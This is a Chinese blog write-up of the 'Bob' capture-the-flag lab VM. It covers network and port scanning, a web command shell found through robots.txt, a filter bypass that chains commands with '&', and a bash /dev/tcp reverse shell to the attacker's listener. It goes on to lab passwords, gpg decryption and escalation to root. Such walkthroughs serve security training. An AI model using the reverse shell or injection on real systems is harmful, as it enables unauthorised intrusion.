Bob靶机游玩体验

已于 2023-01-08 18:26:11 修改
阅读量410 收藏 4
点赞数 1
文章标签: linux 服务器 网络安全 web安全 Powered by 金山文档
于 2023-01-08 13:18:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WULI_KK/article/details/128600100
版权

Bob中的flag

打开Bob,不知道用户密码

信息收集

存活主机扫描

使用kali对C网段进行扫描:

arp-scan -l

开放端口扫描

可知Bob所在ip为192.168.1.11,使用nmap扫描Bob开放的端口:

 namp -Pn -p- 192.168.1.11  
 #-Pn:扫描之前不需要用ping命令,有些防火墙禁止ping命令。可以使用此选项进行扫描
 #-p-:-p指定扫描的端口,后面可以接一个范围例如(-p1-65533),就代表扫描1-65533端口,-p-同理

扫出有两个开放端口一个http服务端口,另一个不知道(应该是ssh),浏览器访问80端口:

出来一个Milburg Highschool(米尔堡高中?)的网站,左上角有登录按键,试试看有没有弱口令:

发现不给我登录!不允许外部登录

网站信息收集

那么先利用御剑扫后台看看能不能扫出东西:

扫出一个关键的后台,robots.txt:是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的。

这可是个敏感的协议信息,找到就不要错过。

命令执行

访问robots.txt:

有个*_shell.php文件,打开查看一下,是一个可查看Bob的命令执行框:

输入whoami可以回馈到给我们'www-data',但是输入一些探查目录表的就不可以执行了

那说明这个命令框还是可以通过我们的输入来得到我们想要的信息,那么应该是通过了设置敏感字符检测来进行防护,那我们可以用一些分割符号来进行连带输入

插入的'||'符号意思是,如果前面可以执行那么就直接执行前面的命令然后结束;也可以插入'&'来使命令共同执行

反弹shell

那么就可以在通过这个命令框执行反弹shell的操作,拿到bob虚拟机的控制权。

开启监听端口

反弹shell需要开启一个用于接收反弹回来的shell命令的窗口,因此需要在攻击机上面执行:

 nc -lvvp 9090 #在9090端口开启监听

写入反弹shell命令并且执行

在命令行输入

 id&echo "bash -i >& /dev/tcp/192.168.1.6/9090 0>&1" | bash  
 bash -i >& /dev/tcp/192.168.1.6/9090 0>&1 #为反弹shell命令
 echo:echo会将输入的字符串送往标准输出。
 bash:当bash作为一个登录的交互shell被调用

查看监听端口

拿到了Bob的权限,退出到Bob的桌面,看到有一个flag.txt文件打开查看发现没有权限打开:

那我们就去找一下home目录里有没有用户密码

home里面有四个用户分别是bob,elliot,jc和seb

提权操作

分别查看每个用户里都有啥,先查看bob用户下的文件

 ls -alh

查看bob用户

发现有一个passwordfile.html,查看一下,应该是jc用户的密码,还有seb用户的密码

看到这请先去看看elliot用户,再回头看这一段

(根据elliot老头说的话,明白bob是boss,所以又回头仔细看看bob有没有藏着掖着)在docunment下有三个文件:

  • 查看一下staff.txt文件里面有什么

 staff.txt
 Seb: #这小子喜欢Elliot老头
 ​
 Seems to like Elliot
 Wants to do well at his job
 Gave me a backdoored FTP to instal that apparently Elliot gave him
 ​
 James: #懒惰虫
 ​
 Does nothing
 Pretty Lazy
 Doesn't give a shit about his job
 ​
 Elliot:  #敌人,互相想让对方开除
 ​
 Keeps to himself
 Always needs to challenge everything I do
 Keep an eye on him
 Try and get him fired

  • login.txt.gpg文件(因为是.gpg文件所以需要密码才能看)

  • Secret文件下的

红线处一个又一个目录下都在说此地无银三百两,所以秘密肯定在里面!文本里面也是废话连篇,但是,那么整齐让我很在意,为什么要那么刻意的用echo来输入然后“”来括起来,有没有一种可能是藏头废话!那么就得到一个‘HARPOCRATES’,这个可能是bob密码,也可能是前面gpg文件的密码,先试试gpg文件。

 gpg --batch --passphrase HARPOCRATES  -d login.txt.gpg

发现没有权限,应该是www-data权限有点低,换成elliot老头试试看(elliot老头密码在下方),得到bob密码为b0bcat_

elliot用户

有一个.txt的文本,可以进行查看的,让我们来看看里面有什么......

 

6......这个elliot老头也太6了,挖个flag也能看到那么精彩的戏份,翻译如下:

(搞得我回去再看了一下扫出来的passwords.html)发现也是同样的在发牢骚...

得到elliot老头的密码:theadminisdumb,但是使用这个人的用户,也不能获取root权限.(还是没有bob地位高啊)

拿到bob密码

ssh连接成功:攻击机输入(也可以直接在bob登录)

 ssh bob@192.168.1.11 -p 25468 #因为可以从开放端口来看ssh的连接端口被改成了25468

使用bob进入到root权限

成功进入到root用户,再返回根目录打开flag.txt

成功拿到flag!


WULI_KK
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
利用ASP.NET框架创建网站登陆
zsybob的专栏
06-09 2176
1、关于登陆验证和授权    很多网站都有登陆对话框,让事先已经注册的用户验证,以便为他们提供个性化的服务等。可以把这个过程看作是两件事情的发生:验证和授权!登陆的作用是验证请求登陆的用户是否合法,而授权则是验证合法的用户在请求资源时,根据他们的权限决定是访问还是拒绝。    以上这种网站本身提供对话框的作法在.NET中被称之为Forms验证模式,接下来将会讲述这种验证模式。在以前ASP陈序员或者
结构专业规范大全_常用规范合集下载(建标库、注册暖通、电气)
weixin_39886024的博客
12-14 3946
建标库:CHM版常用规范合集下载建筑专业规范大全2019年11月版结构专业规范大全2019年11月版给水排水规范大全2019年11月版暖通专业规范大全2019年11月版电气专业规范大全2019年11月版施工验收规范大全2019年11月版城市规划规范大全2019年11月版法律法规规范大全2019年11月版消防专业规范大全2019年11月版建标库可下载的是CHM网页版本http://www....
forms身份验证
carlbiao
01-12 1636
在发出登录请求时,需要在网页上填写一个表单并将该表单提交到服务器服务器在接受该请求之后,讲向用户的本地机器写一个cookie(是当你访问某个站点时,随某个HTML网页发送到你的浏览器中的一小段信息)送回服务器,这样用户就可以根据自己的希望保持身份验证状态。例如:1、用户,假如是Bob。希望查看页面A,匿名用户不可以访问这个页面,因此当Bob试图访问页面A是,浏览器取而代之显示一个登陆页面
实验六 Bob渗透
m0_56948411的博客
12-03 7021
实验六 Bob渗透一、实验目的1. 通过对目标靶机的渗透过程,熟悉网络扫描、代码审计、权限提升、Linux中文件命令的使用和提高对信息挖掘的能力。二、实验环境攻击工具:kali虚拟机(10.24.231.60)靶场:Bob:1.0.1~VulnHub三、实验原理找到初始信息,比如一个ip地址或者一个域名;找到网络地址范围,或者子网掩码,找到开发端口和入口点,弄清每个端口运行哪种服务,找到目标存在的漏洞;找到账号密码从而提高权限获取最终胜利。四、实验过程及分析(一)信息收集如图1-1,1-2,使用nmap扫描
暴打bob靶机
qq_41263192的博客
09-04 3566
实验环境: kali:192.168.126.130 bob靶机:192.168.126.129 一、信息收集 扫描目标ip地址 扫描目标主机的端口发现有80端口,尝试登录网页查看在网页中查找到了相关信息 大意是,学校网站被黑客攻击,之后将不能登录网站之类的。 在网站的联系我们中找到了关键词:admin,所以推测bob J有可能是管理员 扫描网站的目录,继续查看网站的其他子目录这里只有状态码为200的网页才可以正常查看 查看robots.txt 目录,发现其下的隐藏目录 二、getshell 继续查
android 弹窗_什么便签备忘录软件横跨Windows、iOS和Android
weixin_39992417的博客
11-03 476
原标题:什么便签备忘录软件横跨Windows、iOS和Android互联网时代的今天,大家对手机和电脑都不陌生。电脑的话,常见的就是Windows电脑。因为它上面自带Office办公软件,另外平台的开放性也很好:在它上面除了办公外,还可以开展看电影、玩游戏等娱乐活动。而手机的话,就不同了。现在的手机基本上分为两大阵营:苹果和安卓阵营。当然了,每个人的品位不同,喜欢的操作系统也不同;有喜欢安卓的,也...
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
PWN靶机环境 网络安全
05-23
PWN靶机环境
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
Android 基于bmob平台的手机登录验证码注册 等功能实现
linzihahaha的博客
12-31 2527
    首先是基于Bmob 平台,采用MVP 开发模式。效果见图:           下面一 一给出源码:   MVP 目录结构:   登录/注册的Activity: package com.example.yangzi.mvp_dev.ui.activity; import android.content.Context; import...
BOB靶机渗透实战-----攻略(大神勿喷)
z2560088的博客
09-21 1968
准备工作 靶场 Bob: 1.0.1 ~ VulnHub 攻击工具kali虚拟机 直接双击打开即可添加到虚拟机。打开后网卡使用NAT模式。 没有给用户名和密码。(给了就没有攻击的必要了 hhh) 开始攻击 打开kali 使用nmap 扫描同网段下的ip和端口(因为靶机也用的NAT模式的网卡,所以按理说应该被分在了与kali虚拟机同网段的某一个ip地址) 我的kali ip 地址为192.168.160.129 nmap -sP 192.168.160.0/24 ...
数字证书及CA详解
热门推荐
lk2684753的博客
08-30 8万+
文章目录1. 证书1.1 证书的应用场景1.2 证书标准规范X.5091.2.1 证书规范1.2.2 证书格式1.2.3 CA证书1.3 公钥基础设施(PKI)1.3.1 什么是公钥基础设施1.3.2 PKI的组成要素用户认证机构(CA)仓库1.3.3 各种各样的PKI2.Fabric - ca2.1 简介2.2 基本组件2.3 安装2.4 初始化&快速启动2.5 服务端配置文件解析2.6...
[任务书+论文+PPT+源码]基于Android与多媒体的英文学习APP的设计与实现
m0_73546099的博客
01-10 5057
multimedia;Internet +目 录1 绪论111.1 项目背景111.2 论文主要工作222 项目相关技术介绍与分析442.1 Android的发展和历史442.2 Android体系结构552.2.1 Application(应用层)552.2.2 Application Framework(应用框架层)552.2.3 Libraries(系统运行库层)552.2.4 Linux Kernel(Linux内核层)66。
2023首届“盘古石杯”全国电子数据取证大赛总决赛题目检材与部分write up
weixin_42744595的博客
06-12 3582
2023首届盘古石杯总决赛write up技术交流wechat N34939 高清图。流量分析部分精品write up可以参考。更多网络安全CTF题目,欢迎来。题目来源盘古石杯赛事公众号。
[B2R]Bob1.0.1
qq_44339430的博客
03-22 976
[B2R]Bob:1.0.1 https://www.vulnhub.com/entry/bob-101,226/ 0x01 靶场信息 靶机界面 ​ 直接从ova文件导入到VM虚拟机中,启动即可。网卡模式选择为NAT模式。 0x02 信息收集 主机发现 ​ NAT模式网卡MAC地址为00:0C:29:5C:C9:AE sudo nmap -sP 192.168.94.0/24 -oN nmap.Bob ​ 可以确定靶机IP地址为192.168.94.134 端口扫描 sudo nmap 192
bob靶机
weixin_52963334的博客
08-14 677
bob靶机实操
靶机渗透之BOb1
最新发布
2301_76227305的博客
02-12 1413
反弹shell命令的使用解密命令的使用在这里理清一下用户这个玩意,一开始我们进入到home目录里面发现有三个用户。但现在我们是没有身份的,只能看一下普通的文件和执行一些普通的命令,这也是为啥我们一开始执行解密命令没权限。但我们发现jc用户的密码,登录jc用户获取身份了。那我们便就可以执行解密的命令,然后获取bob的密码。最后登录bob用户,发现bob用户在root组里面,可以变成root用户。那为啥jc不能变成root用户呢,因为它不在root组里面。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值